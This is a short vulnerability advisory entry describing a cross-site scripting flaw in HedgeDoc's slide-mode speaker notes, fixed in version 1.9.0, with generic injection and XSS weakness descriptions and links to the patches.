HedgeDoc is a platform to write and share markdown. In versions prior to 1.9.0, an unauthenticated attacker can inject arbitrary JavaScript into the speaker-notes of the slide-mode feature by embedding an iframe hosting the malicious code into the slides or by embedding the HedgeDoc instance into another page. The problem is patched in version 1.9.0. There are no known workarounds aside from upgrading.
The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
| Link | Tags |
|---|---|
| https://github.com/hedgedoc/hedgedoc/security/advisories/GHSA-j748-779h-9697 | third party advisory patch |
| https://github.com/hedgedoc/hedgedoc/pull/1369 | third party advisory patch |
| https://github.com/hedgedoc/hedgedoc/pull/1375 | third party advisory patch |
| https://github.com/hedgedoc/hedgedoc/pull/1513 | third party advisory patch |